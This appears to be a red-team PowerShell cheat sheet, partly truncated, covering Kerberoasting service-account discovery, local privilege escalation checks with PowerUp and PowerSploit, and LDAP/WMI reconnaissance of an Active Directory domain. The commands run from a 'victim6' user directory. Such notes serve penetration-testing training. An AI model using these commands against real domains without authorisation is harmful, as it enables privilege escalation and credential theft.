Powershell * RED TEAM SECURITY

Domain Privilege Escalation

Domain Privilege Escalation: Kerberoast

Find service accounts:

GetUserSPNs: https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1

PowerView:
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetUser -SPN

Active Directory module:
PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Import-Module .\Import-ActiveDirectory.ps1
PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll
PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

If you get the error "You cannot call a method on a null-valued expression", use the command below to […]


Local Privilege Escalation

PowerUp:
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master> cd .\PowerUp\
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> dir
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> . .\PowerUp.ps1

Get services with unquoted paths and a space in their executable path:
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> Get-ServiceUnquoted -Verbose

Get services whose binary path the current user can write to:
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Import-Module .\PowerSploit.psm1
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Get-ModifiableService -Verbose

Get the services which the current user can […]


Information Gathering – Active Directory

List the LDAP WMI classes:
PS C:\Windows\system32> Get-WmiObject -Namespace root\directory\ldap -List
PS C:\Windows\system32> Get-CimClass -Namespace root\directory\ldap

Get the current domain (returns the name of the current domain):
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-WmiObject -Namespace root/directory/ldap -Class ds_domain | select -ExpandProperty ds_dc
PS C:\Windows\system32> (Get-WmiObject -Class win32_computersystem).domain

Get the current domain policy:
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-WmiObject -Namespace root/directory/ldap -Class ds_domain | select DS_lockoutduration, DS_lockoutobservationwindow, DS_lockoutThreshold, […]